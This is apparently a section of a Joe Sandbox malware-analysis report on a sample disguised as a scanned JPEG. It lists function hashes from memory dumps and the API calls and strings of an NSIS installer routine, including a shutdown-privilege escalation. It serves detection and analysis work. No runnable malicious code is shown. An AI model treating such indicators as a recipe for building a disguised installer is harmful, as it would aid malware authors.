Instruction Fuzzy Hash: BC214430600254CFDB14EB78C969A9E7BF1FF48305F2004A8E806EB3A0EB399C45CB51

Function 000AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157539206.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93497be94f05f3d05d7cca112eea9e3215779c456f5c656aeb1ab812a69d109
Instruction ID: 5dd2559dd0efa8e1703916553f4b1428ce70da4b875191f3f4fcca33e562de16
Opcode Fuzzy Hash: d93497be94f05f3d05d7cca112eea9e3215779c456f5c656aeb1ab812a69d109
Instruction Fuzzy Hash: 3F212271604300EFDB20DFA4D9C0F1ABBA1EB89314F30C56AD84A4B642C37AD857CB62

Function 001516F8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5096f3520fe19ee9519b2ef0adbc11c71f74807cd4df3fe76e7bf4f17072cdd8
Instruction ID: 1172b5a186e603abcd4ba544e4956cf51129edb7c356184b20a3d1b918b74d2b
Opcode Fuzzy Hash: 5096f3520fe19ee9519b2ef0adbc11c71f74807cd4df3fe76e7bf4f17072cdd8
Instruction Fuzzy Hash: 2C217834B00208DFDB15EB78C5147AE73F2AB8D346F200468D816EB3A0EB368C44CB91

Function 00157F38 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de51c7f96a517753b17536c4cfaa5259f237b182c87b6fded268cc9519ef40a2
Instruction ID: b0def0c946ca13424fb2ab80018dd19f3313e8c6eb835895e79be604425c18f2
Opcode Fuzzy Hash: de51c7f96a517753b17536c4cfaa5259f237b182c87b6fded268cc9519ef40a2
Instruction Fuzzy Hash: C2212130E14305DBDB19CFA9D45169EF7B6AF89310F20861AEC25BB390DB71AC49CB50

Function 00151520 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9384f982438a1c9928ce84da7281aedc1ec2bf393080e5378e52ff5d6eda7270
Instruction ID: 8266506fedfcfdb5364151e9602d965d7593d2e131d7b85455823f5495f8ca0f
Opcode Fuzzy Hash: 9384f982438a1c9928ce84da7281aedc1ec2bf393080e5378e52ff5d6eda7270
Instruction Fuzzy Hash: 5C21B734B20201AFEB22DB28D88479D3365EB86325FA14835E417CF350EB34DC5ACB96

Function 00154E08 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626fee16463f1b04dcb14103173c7b20c85436c9f7c3d731b81c175484e30333
Instruction ID: de087b8bbcb0d76da4fb31fd23ac6b5b5fedd3d82039b82d668487c9b7e4f337
Opcode Fuzzy Hash: 626fee16463f1b04dcb14103173c7b20c85436c9f7c3d731b81c175484e30333
Instruction Fuzzy Hash: BF21D234610214CFDB54EF78C959AAE77F1FB88345F200568E806EB3A0EB399D45CB61

Function 359A4E08 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d61823ff20b6b4f16ada6b3869e220407d77a783c5301360031596ee2bd7a4
Instruction ID: fb1ddaecc8d6ed0fb98567ede9e7ef889a019274b7f4b2d13d3796050d8b0c8c
Opcode Fuzzy Hash: 74d61823ff20b6b4f16ada6b3869e220407d77a783c5301360031596ee2bd7a4
Instruction Fuzzy Hash: FE21B435B00114DBEF04DA68D954B9EB7B7EB85360F248425E409EB351EB35EC418BA0

Function 0015EA10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991fd476800d22ec076ef6c1ee3171b56cbba88a74a67e8fbe0af00721850a99
Instruction ID: 9bf94d2fc31b24bba08759e56af5cb880358d78e4b2795f3db4a777765329fbb
Opcode Fuzzy Hash: 991fd476800d22ec076ef6c1ee3171b56cbba88a74a67e8fbe0af00721850a99
Instruction Fuzzy Hash: C321E2B5901259DFCB50CFA9D484BDEFBF4EF48310F24806AE918AB245D374AA45CBA1

Function 000AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157539206.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc33ec036b54df9aa4e90c9d1d07a8a2a6698456a26f7fe678c6f82610e74ce
Instruction ID: 5b39f525931b0c06ef8a58de1d144e27772409349ec3b00b8ad261954553564e
Opcode Fuzzy Hash: 8dc33ec036b54df9aa4e90c9d1d07a8a2a6698456a26f7fe678c6f82610e74ce
Instruction Fuzzy Hash: 8B2130755083809FCB12CF64D994B11BFB1EB46314F28C5DAD8498F656C33A9856CB62

Function 00150848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3b9106c4f3ae4b28ae549637d91a1b16f5eb36ff37451b7c435ffc033b00bb
Instruction ID: 839e1d9fa430a180121e00af59f486d5bc36d86d8a35e1fb21e53ac17c2d1960
Opcode Fuzzy Hash: 2f3b9106c4f3ae4b28ae549637d91a1b16f5eb36ff37451b7c435ffc033b00bb
Instruction Fuzzy Hash: 2B119430F00605CBDF269AF8C454B6933A5EB89316F214879D826DF355EB25CC4A8BC1

Function 00151631 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4934875868213000cff21fef40c94da55bbed2866fae2439620c51f97d4b4403
Instruction ID: 25480b096b7ba3b57e20520645ee0101e0bc7088850f81e57f509add5688ff85
Opcode Fuzzy Hash: 4934875868213000cff21fef40c94da55bbed2866fae2439620c51f97d4b4403
Instruction Fuzzy Hash: CA114C35B042519FCF129BB86C4879E3FF1EB89350F140569E905E7341DB388941C7A2

Function 359A2740 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d17f17615f9821d72d8fba80392d0bac0a17173041085575724713d53828a7e
Instruction ID: 3654908ea4ef5f814db9df6ecb1f8bfde06b8a12f29250d24757989852b60fe2
Opcode Fuzzy Hash: 6d17f17615f9821d72d8fba80392d0bac0a17173041085575724713d53828a7e
Instruction Fuzzy Hash: 9A118236B041148BEF55DA78C814A9E72EAEBC8710F048139C505EB340EF65DC128BA0

Function 00151470 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445f90309ed307e981361099136e50b26831296a794964a4f5e4935543fd5ebb
Instruction ID: d4db4bdab8eb8cf81fb54eff2c27060dffbc560c56b0fc16e20ae7f6be42402d
Opcode Fuzzy Hash: 445f90309ed307e981361099136e50b26831296a794964a4f5e4935543fd5ebb
Instruction Fuzzy Hash: AD11A731A00255DFCF22EFB884546AD7BB5EF49312B14047AE825EB241E731CC868B91

Function 0015E8D8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9308119e6334cfaaced686caabb34648ecf12e08ed533b5f8f29d0fa2458ae7a
Instruction ID: 6d0b7b4ce8b2dd11dc3db5b2a26f3930e69684dfc21fd2e9ec17b716e2569895
Opcode Fuzzy Hash: 9308119e6334cfaaced686caabb34648ecf12e08ed533b5f8f29d0fa2458ae7a
Instruction Fuzzy Hash: 5F116AB2800249DFCB10CF99D844BEEBFF4EF48360F148429E918A7241C379A954DFA5

Function 359AD2C0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a681c6234be2febcdbf300d052b12159ded35e114c6e409b885939975377df34
Instruction ID: df3d5145e82af4d7fa5c2d72041c9f138f467d2a0a6ec9621685f9977f9b1a46
Opcode Fuzzy Hash: a681c6234be2febcdbf300d052b12159ded35e114c6e409b885939975377df34
Instruction Fuzzy Hash: 4F017136B046100BFB15966C9464B5F77EBEBCB710F11843AE44ACB351EE29DC0387A5

Function 0015F008 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f70e21c3b609c69625e2664485f27032884196ed4952ecc8f5a27c0a72432d
Instruction ID: c57a7ef2110d87346caf3b85557903796d9a22bfdbb0b2e9f2aa2481d13c546c
Opcode Fuzzy Hash: 03f70e21c3b609c69625e2664485f27032884196ed4952ecc8f5a27c0a72432d
Instruction Fuzzy Hash: FA116AB6800249DFCB11CF99D944BDEBBF4EF48350F148419E514A7241C3359555DFA1

Function 00151480 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c86710c1d663c769188ffff307b91c17565cbfd013833c297e96c6ae7123c0
Instruction ID: ae307ce52a4cdab481cd0540fa319a47c8446da13e458249aeacc5e62fc7896a
Opcode Fuzzy Hash: d7c86710c1d663c769188ffff307b91c17565cbfd013833c297e96c6ae7123c0
Instruction Fuzzy Hash: E7016171E00255EBCF22EFB984552AE7BF9EB49312B14047AE825EB241E735CC858B91

Function 359A2730 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df2f9f6e092c8008095203b9b8bf395b53c213c479c0bdc85e62e9d19a91596f
Instruction ID: 4f3090523eda1d532685fd6594ff2824c01a77a9d7bcbe2bf0a3575f08e49ce0
Opcode Fuzzy Hash: df2f9f6e092c8008095203b9b8bf395b53c213c479c0bdc85e62e9d19a91596f
Instruction Fuzzy Hash: 5901B13AB002145BEF45EA78C924BDF73ABEBC8300F05843AC105EB240EF619D129BE1

Function 359A2400 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb49347af080c49a55d4ea7778f47ce57330e7e0136bbd6996e148486855e60
Instruction ID: dc37a234641e9443583dc909341533eaa4c24295e0196e372b52d0bdf9e276ae
Opcode Fuzzy Hash: 6bb49347af080c49a55d4ea7778f47ce57330e7e0136bbd6996e148486855e60
Instruction Fuzzy Hash: 7C11B0B5D01259AFCB00DFAAD884BDEFBF4FF49350F50852AE518A7240C374A954CBA5

Function 359A2988 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da1230fbc517a322c6dfc667873d98388726a86b3cd7292d657ea7278e9415b
Instruction ID: 36f49bab0bd4b99e2a5e62670004d4ca804d242cab0af7f6b6f6545a916c16e5
Opcode Fuzzy Hash: 9da1230fbc517a322c6dfc667873d98388726a86b3cd7292d657ea7278e9415b
Instruction Fuzzy Hash: D40162367045104BFB14966D9414B0BA3DFDBCA760F108439E10ECB355DE65DC5247A5

Function 359AD2D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465a1d196d024e0f6a83fac48dc9a2b9e2e17dbce5c989af3ae92a948b9904d9
Instruction ID: 25815f61b871b18b0bbadbb4845ca62a12a6741ceed476f58d480a110fbbea0b
Opcode Fuzzy Hash: 465a1d196d024e0f6a83fac48dc9a2b9e2e17dbce5c989af3ae92a948b9904d9
Instruction Fuzzy Hash: 9E01AF3A7006110BFB15966C98A4F1F77DBEBCA760F118839E50AC7341EF29DC0287A5

Function 0015099B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9080958063b4539f326b589d3fd4355c3495a1463d58a43df3832bfb4632730
Instruction ID: 32f68664826ef366bf0cfdc337360b52f0672bd1c4dd5beb4b1b9512e1007ca5
Opcode Fuzzy Hash: e9080958063b4539f326b589d3fd4355c3495a1463d58a43df3832bfb4632730
Instruction Fuzzy Hash: FDF0F421A19A06C6EE3B11E84914B3C6211AB6833BF54063ADC7ACF296C700CC5DE2D6

Function 359A8448 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f545ada907168ac3137942b54c4438d7e4b0f33a6f7a9cd6fb61c9c14ad3d27
Instruction ID: c67d1946a6e89167b5b486c51d133e128f56587328e2ef3fdd0b0dfafa54c0d1
Opcode Fuzzy Hash: 1f545ada907168ac3137942b54c4438d7e4b0f33a6f7a9cd6fb61c9c14ad3d27
Instruction Fuzzy Hash: 59018739B004144BF710EA7CD864B5A77DAEB8A764F108838E10EDB750EF29EC0287A5

Function 359ADB89 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a5a84252451df73310957230a702de02b29e74098e9bf92cd6157264e8b19a
Instruction ID: 707a0294994eadf9badc7fcab2cc549d5261a5fb50f8765ffe01ef91ab98f8f8
Opcode Fuzzy Hash: 62a5a84252451df73310957230a702de02b29e74098e9bf92cd6157264e8b19a
Instruction Fuzzy Hash: E00122357003150FEB11EA39D86169B73EBEFC6760F86487AE446CB241CB24DC06CBA1

Function 001553E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7602021631a702b2da55f48faaca4ce74885f64cab8defc564d3403ba143b0e8
Instruction ID: 6c4ad6ad2d9419882e4589f240e4a19fb65c68afc89e5848b6974be2ca32df03
Opcode Fuzzy Hash: 7602021631a702b2da55f48faaca4ce74885f64cab8defc564d3403ba143b0e8
Instruction Fuzzy Hash: 0B01D130A00254DBDB00EBB888513AE3BE5AF04751F204465D929EF292FB25CA869B86

Function 0015E50C Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b0a8f350e37fcc0d0073eb3c067e48103a2daad9f4f273c67bf74821b483fe
Instruction ID: 6e9606218b668df45528fdf0a729c3a4b13e4a4b5e466ba9b5c4ad801a5e7524
Opcode Fuzzy Hash: 44b0a8f350e37fcc0d0073eb3c067e48103a2daad9f4f273c67bf74821b483fe
Instruction Fuzzy Hash: 1BF08C35B001188BDB04CBA8D840BDEB7F1FF88326F148261E529AB295D635D9158BA0

Function 0015EDD0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c3458ec9ba50a838d79ddb8305ed9d073abab9a1eed4a293f4d39ac607d56f
Instruction ID: bafedebca8cad203b09067d976dad1d797c5f2ff7d7b4d0bec8e1b042ada8bea
Opcode Fuzzy Hash: 84c3458ec9ba50a838d79ddb8305ed9d073abab9a1eed4a293f4d39ac607d56f
Instruction Fuzzy Hash: C9F08276700218ABDF059E99E8119AF7BEBEBC8360B40803AF91997251DF325D2197B1

Function 359AAD08 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa653bcc59caaaf5cfec0afece7277f8b4532fb6254c829d867a7227577a673
Instruction ID: 3f75d3e6160bb4c62644bd197cc1ec4d4ab1a099b08fa443bf9d571908bacf15
Opcode Fuzzy Hash: cfa653bcc59caaaf5cfec0afece7277f8b4532fb6254c829d867a7227577a673
Instruction Fuzzy Hash: 06F0A037A10268A7DB249976DC00A9BB77AF784355F10442AED10AB340EB71AC06CBE0

Function 0015E5E0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9dcbf76dda1a92440aa1bd09600be8c6346b234037de58f722f6eb584d410bd
Instruction ID: d4976949d8a9441db9bdf110668da5968fbaf51d705e1117425412191dbdcd4f
Opcode Fuzzy Hash: e9dcbf76dda1a92440aa1bd09600be8c6346b234037de58f722f6eb584d410bd
Instruction Fuzzy Hash: 4FF0A0B2E00215CFCB90EEB8A9002EBBBF1EB44340F114826C814E7200E730DA168BC1

Function 359A63D0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6be1fe3d2fa395d0035a1fcd5d8b20a388e6ff651d8cd0587bd8792c32612d
Instruction ID: 2a1b456f20b84f4bb78dee86092267929f4c7d22945a3f48dfc825a3903b87ea
Opcode Fuzzy Hash: fb6be1fe3d2fa395d0035a1fcd5d8b20a388e6ff651d8cd0587bd8792c32612d
Instruction Fuzzy Hash: 81F05E7BE08214CFEB24CE64E9407A97BB5FB40391F116065D902A7190CB759947CAB1

Function 0015E5F0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0360c2203ceb174d2c402b4b96c1b67add400cfa62e6d6d0de650ade4375fc00
Instruction ID: 77e10f976d2c1b3ee8df467a3064f92a53bc67a348257cefbeb2170109690f99
Opcode Fuzzy Hash: 0360c2203ceb174d2c402b4b96c1b67add400cfa62e6d6d0de650ade4375fc00
Instruction Fuzzy Hash: 1FE01AB1E10219DB8B54EEB9A8042AA7AF8AB54291F108876D819E7200E731DA148BD1

Function 359A31D1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3558facd179fe7dee0e55ff62267f25f6cb13a120c1993bfd89486d6e23075d1
Instruction ID: f2723bd1bfa926155bd412111cfbdb4b64c251b7d1ff456c3810e90b5f988fd1
Opcode Fuzzy Hash: 3558facd179fe7dee0e55ff62267f25f6cb13a120c1993bfd89486d6e23075d1
Instruction Fuzzy Hash: 14F0FE75A20219EFDB14DF90E9557AD7BB2FF88700F200219E802A7294DB741C42DF90

Non-executed Functions

Function 004031D6 Relevance: 75.6, APIs: 32, Strings: 11, Instructions: 366stringcomfileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004031FB
GetVersion.KERNEL32 ref: 00403201
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403234
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403270
OleInitialize.OLE32(00000000), ref: 00403277
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403293
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032A8
CharNextA.USER32(00000000,00429000,00000020,00429000,00000000,?,00000006,00000008,0000000A), ref: 004032E4
GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033E1
GetWindowsDirectoryA.KERNEL32(0042A400,000003FB,?,00000006,00000008,0000000A), ref: 004033F2
lstrcatA.KERNEL32(0042A400,\Temp,?,00000006,00000008,0000000A), ref: 004033FE
GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp,?,00000006,00000008,0000000A), ref: 00403412
lstrcatA.KERNEL32(0042A400,Low,?,00000006,00000008,0000000A), ref: 0040341A
SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low,?,00000006,00000008,0000000A), ref: 0040342B
SetEnvironmentVariableA.KERNEL32(TMP,0042A400,?,00000006,00000008,0000000A), ref: 00403433
DeleteFileA.KERNEL32(0042A000,?,00000006,00000008,0000000A), ref: 00403447

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

Part of subcall function 00403798: lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410), ref: 00403888
Part of subcall function 00403798: lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
Part of subcall function 00403798: GetFileAttributesA.KERNEL32(004226A0), ref: 004038A6
Part of subcall function 00403798: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038EF
Part of subcall function 00403798: RegisterClassA.USER32(00422EA0), ref: 0040392C

Part of subcall function 004036BE: CloseHandle.KERNEL32(FFFFFFFF,004034F5,?,?,00000006,00000008,0000000A), ref: 004036C9

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034F5
ExitProcess.KERNEL32 ref: 00403516
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403633
OpenProcessToken.ADVAPI32(00000000), ref: 0040363A
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403652
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403671
ExitWindowsEx.USER32(00000002,80040002), ref: 00403695
ExitProcess.KERNEL32 ref: 004036B8

Part of subcall function 00405686: MessageBoxIndirectA.USER32(00409218), ref: 004056E1

Strings

~nsu, xrefs: 00403521
TMP, xrefs: 0040342E
Error launching installer, xrefs: 004034AD
UXTHEME, xrefs: 00403228, 0040322D, 00403233
NSIS Error, xrefs: 00403299
SeShutdownPrivilege, xrefs: 0040364C
TEMP, xrefs: 00403426
", xrefs: 00403309
.tmp, xrefs: 0040353D
Low, xrefs: 00403414
\Temp, xrefs: 004033F8

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
